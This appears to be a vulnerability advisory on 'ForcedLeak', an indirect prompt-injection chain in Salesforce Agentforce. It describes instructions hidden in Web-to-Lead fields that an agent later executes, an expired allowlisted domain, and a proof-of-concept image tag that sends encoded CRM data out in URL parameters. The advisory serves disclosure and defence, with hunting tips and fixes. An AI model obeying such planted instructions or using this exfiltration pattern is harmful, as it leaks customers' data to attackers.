Summary
Noma Labs disclosed ForcedLeak, a critical vulnerability chain in Salesforce Agentforce that allowed external adversaries to exfiltrate sensitive CRM data via indirect prompt injection. Malicious instructions were embedded in Web-to-Lead submissions and later executed by Agentforce during normal employee interactions. A Content Security Policy (CSP) whitelist weakness (including an expired, attacker-acquirable domain) enabled data exfiltration via trusted-looking URLs. Salesforce has deployed mitigations; customers should harden configurations and audit for suspicious leads.
‍
Who’s Affected
Organizations using Salesforce Agentforce where:
- Web-to-Lead (or similar externally sourced data intake) is enabled, and
- Agentforce agents retrieve and act on lead data (autonomous tool use, summarization, emailing, etc.).
Business Impact
- Data exposure: Customer PII, contact details, sales pipeline/strategy, notes/communications, third-party integration data, historical interactions.
- Blast radius: Potential lateral movement via connected apps/APIs; time-delayed trigger when staff later query the AI.
Technical Overview
- Indirect Prompt Injection:
- Attacker submits a lead with malicious instructions in a large field (e.g., Description ~42k chars).
- Later, a user asks the agent to “review and reply to this lead,” causing the AI to process and execute the hidden instructions from the lead data.
- Model/Context Boundaries:
- Agentforce accepted and executed instructions mixed into trusted context (lead data) rather than limiting to user prompts or vetted tools.
- CSP Whitelist Bypass (Critical Enabler):
- CSP included a whitelisted domain that had expired and could be purchased/controlled by an attacker.
- Payload directed the agent to embed an image referencing that trusted domain with exfiltrated data encoded in query params, enabling covert data egress.
- Proof-of-Concept Flow:
- Malicious Web-to-Lead Description → Employee prompt (“please check lead X and reply”) → Agent composes output with an <img src="https://{trusted-domain}/c.png?n=<encoded-data>"> → HTTP request to attacker-controlled (but whitelisted) domain captures CRM data.
Detection & Hunting Ideas
- Lead Data Review: Search recent leads for unusual phrasing, HTML/IMG tags, or instruction-like text (e.g., “include an image with …?n={{…}}”).
- Agent Run Telemetry: Identify Agentforce tool calls/outputs that inserted external image or link references during lead handling.
- Time-Delayed Indicators: Queries or emails generated by agents shortly after employees view/ask about specific leads.
Recommendations
- Enforce Trusted URLs:
- Sanitize Untrusted Inputs:
- Treat Web-to-Lead data as untrusted; strip HTML/JS, block templating tokens, disallow external resource references.
- Lead Data Review:
- Lead Data Review: Search recent leads for unusual phrasing, HTML/IMG tags, or instruction-like text (e.g., “include an image with …?n={{…}}”).
Timeline
- 2025-07-28: Noma Labs reports “ForcedLeak” to Salesforce.
- 2025-07-31: Salesforce acknowledges.
- 2025-09-08: Salesforce deploys Trusted URLs Enforcement for Agentforce & Einstein AI; re-secures expired allowlist domain.
- 2025-09-25: Public disclosure.
